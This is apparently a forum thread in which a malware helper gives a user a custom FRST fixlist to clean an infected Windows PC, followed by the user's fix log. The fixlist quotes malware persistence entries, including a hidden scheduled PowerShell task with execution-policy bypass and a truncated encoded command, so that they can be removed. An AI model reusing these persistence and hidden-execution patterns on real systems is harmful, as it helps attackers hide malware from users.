FirewallRules: [UDP Query User{7392B614-972A-4972-B8F8-28749440D789}C:\program files (x86)\google\google earth\plugin\geplugin.exe] => (Allow) C:\program files (x86)\google\google earth\plugin\geplugin.exe
FirewallRules: [TCP Query User{DDA9B4CD-3DF1-4469-B3FE-070EF7A86EC6}C:\program files (x86)\google\google earth\plugin\geplugin.exe] => (Allow) C:\program files (x86)\google\google earth\plugin\geplugin.exe
FirewallRules: [UDP Query User{34E14A01-F9E8-4267-8EA7-E3C3B20793D1}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{8FAF2E1A-7C1C-46B6-8A24-DDFF6F3CB587}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [{3927FDEE-D203-49B2-86FB-1C0E7F9A4D35}] => (Allow) C:\Program Files (x86)\Skype\Plugin Manager\skypePM.exe
FirewallRules: [{417BB503-D3CA-42F3-AE78-42BC29D734BF}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [UDP Query User{20DA2450-7570-4E1E-9031-5816647CB0C0}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [TCP Query User{469672CA-3068-496A-B6F3-6D056B3F94EC}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{C27863DD-DA18-4517-9A46-147356DC04A0}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{36CAA9A0-CF2F-41E3-9FFF-3450874D5C59}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{243172E8-4B5F-425F-BF04-B2B5F3E7A403}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [TCP Query User{1D2DFD0E-D5EC-4752-92B8-E368E89284D6}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [UDP Query User{0BADF6E7-E1A0-4CE7-94DA-DE08AEBF5D82}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [TCP Query User{6F9CFA5F-43B7-4F38-A2EB-33D24482AFE2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [UDP Query User{524D3047-F543-423C-BBA2-C1F85282F68F}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [TCP Query User{13D475FB-EBA1-485F-B917-A220EB173BA6}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [{CB64B9E6-D340-4DA4-9DBC-3CE7972F23C2}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{CB94E3EA-4BB6-49CD-92DE-2A6D3626595D}] => (Allow) svchost.exe
FirewallRules: [{13481E17-AC7A-4230-9EE2-845150465099}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{26F76935-5395-4CFB-B3F1-97D86DCC8895}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{6A3B6260-5598-44EC-94C0-6CEC29EFFBB4}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
FirewallRules: [{CD1C20A4-B959-4729-931C-C3598550BCFE}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
FirewallRules: [TCP Query User{DD45F684-9FA9-4724-9211-05A5AC782004}C:\program files\guillemot\tools\giwebupdater.exe] => (Allow) C:\program files\guillemot\tools\giwebupdater.exe
FirewallRules: [UDP Query User{EA8B7F99-BCEF-40B7-A6E6-9255A47C8E05}C:\program files\guillemot\tools\giwebupdater.exe] => (Allow) C:\program files\guillemot\tools\giwebupdater.exe
FirewallRules: [{E125522E-6A95-43C3-A739-0A43B77932BE}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{FDECD1B7-A4CE-4897-A0A2-4C236EA4E1EB}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{B56AF803-58A6-420D-BD6F-7CA4894059E0}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
FirewallRules: [{66E515AA-3866-43D4-A43A-638A1633EE3E}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{118538F5-48A3-417E-B888-2E5CD50FFF8F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
 
==================== Restore Points =========================
 
05-04-2016 13:18:41 Scheduled Checkpoint
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/08/2016 10:09:18 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
Error: (04/08/2016 10:03:13 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
Error: (04/07/2016 06:10:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RONIN-LAPTOP)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (04/07/2016 06:10:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RONIN-LAPTOP)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (04/07/2016 05:35:50 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.
 
Error: (04/07/2016 05:06:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RuntimeBroker.exe, version: 10.0.10240.16384, time stamp: 0x559f39eb
Faulting module name: ntdll.dll, version: 10.0.10240.16683, time stamp: 0x56ad9704
Exception code: 0xc0000409
Fault offset: 0x000000000002b45e
Faulting process id: 0x6f0
Faulting application start time: 0xRuntimeBroker.exe0
Faulting application path: RuntimeBroker.exe1
Faulting module path: RuntimeBroker.exe2
Report Id: RuntimeBroker.exe3
Faulting package full name: RuntimeBroker.exe4
Faulting package-relative application ID: RuntimeBroker.exe5
 
Error: (04/07/2016 04:30:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RuntimeBroker.exe, version: 10.0.10240.16384, time stamp: 0x559f39eb
Faulting module name: ntdll.dll, version: 10.0.10240.16683, time stamp: 0x56ad9704
Exception code: 0xc0000409
Fault offset: 0x000000000002b45e
Faulting process id: 0x142c
Faulting application start time: 0xRuntimeBroker.exe0
Faulting application path: RuntimeBroker.exe1
Faulting module path: RuntimeBroker.exe2
Report Id: RuntimeBroker.exe3
Faulting package full name: RuntimeBroker.exe4
Faulting package-relative application ID: RuntimeBroker.exe5
 
Error: (04/07/2016 03:58:21 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
Error: (04/07/2016 03:55:15 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
Error: (04/07/2016 03:53:18 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
 
System errors:
=============
Error: (04/08/2016 09:46:35 AM) (Source: sptd) (EventID: 4) (User: )
Description: Driver detected an internal error in its data structures for .
 
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/07/2016 06:10:24 PM) (Source: DCOM) (EventID: 10010) (User: RONIN-LAPTOP)
Description: App.AppXw3qcpc7p849541dp39vvqd01bn7z9ybh.mca
 
Error: (04/07/2016 06:10:23 PM) (Source: DCOM) (EventID: 10010) (User: RONIN-LAPTOP)
Description: CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca
 
Error: (04/07/2016 06:10:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/07/2016 06:10:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/07/2016 06:10:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
 
CodeIntegrity:
===================================
  Date: 2016-03-11 18:17:52.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.703
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.394
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.129
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:50.762
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.939
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.925
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.802
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 00:41:18.766
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 450 @ 2.40GHz
Percentage of memory in use: 45%
Total physical RAM: 3885.5 MB
Available physical RAM: 2102.95 MB
Total Virtual: 7853.5 MB
Available Virtual: 4729.97 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.4 GB) (Free:2.41 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:180.26 GB) (Free:117.9 GB) NTFS
Drive w: (BIOS_RVY) (Fixed) (Total:12 GB) (Free:3.31 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 9C73A223)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

Edited by xXToffeeXx, 08 April 2016 - 12:05 PM.

BC AdBot (Login to Remove)

 

#2 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,086 posts
  • OFFLINE
    •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:01:32 PM

Posted 08 April 2016 - 01:25 PM

Hi Ronins8,
 
We need to run a fix with FRST:

  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter.
  • Copy and paste the script below in the notepad document:​
HKLM-x32\...\Run: [win_en_77] => [X]
HKLM-x32\...\Run: [Rt562@] => C:\WINDOWS\Disable  task manager .bat
C:\WINDOWS\Disable  task manager .bat
HKLM-x32\...\Run: [QwaT] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rty01] => C:\WINDOWS\call.vbs
C:\WINDOWS\call.vbs
HKLM-x32\...\Run: [TV] => C:\WINDOWS\TV
C:\WINDOWS\TV
HKLM-x32\...\Run: [QwaT78] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT21] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rt45] => C:\WINDOWS\auto explore.bat
C:\WINDOWS\auto explore.bat
HKLM-x32\...\Run: [QwaT55] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT22] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaTgg] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT5] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT4] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT1] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [BSOD] => C:\WINDOWS\bsod.hta
C:\WINDOWS\bsod.hta
HKLM-x32\...\Run: [rst] => C:\WINDOWS\rst.bat
C:\WINDOWS\rst.bat
HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat [134 2016-04-07] () <===== ATTENTION
C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat
HKLM\...\Winlogon: [Userinit] wscript,
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [wdbext] => rundll32.exe "C:\Users\RoNiN\AppData\Local\wdbext.dll",wdbext <===== ATTENTION
C:\Users\RoNiN\AppData\Local\wdbext.dll
AppInit_DLLs: C:\ProgramData\AppxikenoZ\Volity.dll => No File
C:\ProgramData\AppxikenoZ
AppInit_DLLs-x32: C:\ProgramData\AppxikenoZ\Goldenphase.dll => No File
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
S4 kBTNrls; "C:\ProgramData\QsKNKvQ\kBTNrls.exe" [X]
S4 Muibguaw; "C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn\Tugboxh.exe" -cms [X]
S4 Nijgatfy; "C:\Users\RoNiN\AppData\Roaming\Kalekuhrin\Kalekuhrin.exe" -cms [X]
C:\ProgramData\QsKNKvQ
C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn
C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
2016-03-13 19:52 - 2016-03-13 19:52 - 00000000 ____D C:\WINDOWS\system32\nod
2016-03-13 19:48 - 2016-03-13 19:48 - 00000000 ____D C:\WINDOWS\system32\aro
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\c
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\ProgramData\1457912307
2016-03-13 19:24 - 2016-03-13 19:47 - 06000640 _____ C:\Program Files (x86)\GUTD8C6.tmp
2016-03-13 19:24 - 2016-03-13 19:24 - 00000000 ____D C:\Program Files (x86)\GUMD7DA.tmp
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\keja
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\byeq
2016-03-13 14:35 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Vilvuk
2016-03-13 14:35 - 2016-03-22 23:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MirhMevf
2016-03-11 19:32 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
Task: {FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2} - System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAA (the data entry has 9540 more characters).
  • Save the file to your desktop and name it as fixlist.txt

Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run.
  • Please copy and paste the log in your next reply.

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~

#3 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • OFFLINE
    •  
  • Local time:02:32 PM

Posted 08 April 2016 - 02:50 PM

Toffee- 

Thanks so much for your quick reply!  Below is a paste of the fixlog.txt, and it did have me restart.  When it restarted the desktop came up this time  :thumbup2:   I'm still getting 'This app is turned off by group policy' when trying to activate windows defender, or edit/remove certain files.  It appears to have made a group 'TrustedInstaller' that has all the rights and my own user (previously an admin) now only has rights to read-only.

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-08 15:23:23) Run:3
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres & DefaultAppPool)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
HKLM-x32\...\Run: [win_en_77] => [X]
HKLM-x32\...\Run: [Rt562@] => C:\WINDOWS\Disable  task manager .bat
C:\WINDOWS\Disable  task manager .bat
HKLM-x32\...\Run: [QwaT] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rty01] => C:\WINDOWS\call.vbs
C:\WINDOWS\call.vbs
HKLM-x32\...\Run: [TV] => C:\WINDOWS\TV
C:\WINDOWS\TV
HKLM-x32\...\Run: [QwaT78] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT21] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rt45] => C:\WINDOWS\auto explore.bat
C:\WINDOWS\auto explore.bat
HKLM-x32\...\Run: [QwaT55] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT22] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaTgg] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT5] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT4] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT1] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [BSOD] => C:\WINDOWS\bsod.hta
C:\WINDOWS\bsod.hta
HKLM-x32\...\Run: [rst] => C:\WINDOWS\rst.bat
C:\WINDOWS\rst.bat
HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat [134 2016-04-07] () <===== ATTENTION
C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat
HKLM\...\Winlogon: [Userinit] wscript,
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [wdbext] => rundll32.exe "C:\Users\RoNiN\AppData\Local\wdbext.dll",wdbext <===== ATTENTION
C:\Users\RoNiN\AppData\Local\wdbext.dll
AppInit_DLLs: C:\ProgramData\AppxikenoZ\Volity.dll => No File
C:\ProgramData\AppxikenoZ
AppInit_DLLs-x32: C:\ProgramData\AppxikenoZ\Goldenphase.dll => No File
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
S4 kBTNrls; "C:\ProgramData\QsKNKvQ\kBTNrls.exe" [X]
S4 Muibguaw; "C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn\Tugboxh.exe" -cms [X]
S4 Nijgatfy; "C:\Users\RoNiN\AppData\Roaming\Kalekuhrin\Kalekuhrin.exe" -cms [X]
C:\ProgramData\QsKNKvQ
C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn
C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
2016-03-13 19:52 - 2016-03-13 19:52 - 00000000 ____D C:\WINDOWS\system32\nod
2016-03-13 19:48 - 2016-03-13 19:48 - 00000000 ____D C:\WINDOWS\system32\aro
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\c
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\ProgramData\1457912307
2016-03-13 19:24 - 2016-03-13 19:47 - 06000640 _____ C:\Program Files (x86)\GUTD8C6.tmp
2016-03-13 19:24 - 2016-03-13 19:24 - 00000000 ____D C:\Program Files (x86)\GUMD7DA.tmp
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\keja
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\byeq
2016-03-13 14:35 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Vilvuk
2016-03-13 14:35 - 2016-03-22 23:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MirhMevf
2016-03-11 19:32 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
Task: {FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2} - System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAA (the data entry has 9540 more characters).
*****************
 
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\win_en_77 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Rt562@ => value removed successfully
"C:\WINDOWS\Disable  task manager .bat" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT => value removed successfully
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Rty01 => value removed successfully
"C:\WINDOWS\call.vbs" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\TV => value removed successfully
"C:\WINDOWS\TV" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT78 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT21 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Rt45 => value removed successfully
"C:\WINDOWS\auto explore.bat" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT55 => value removed successfully
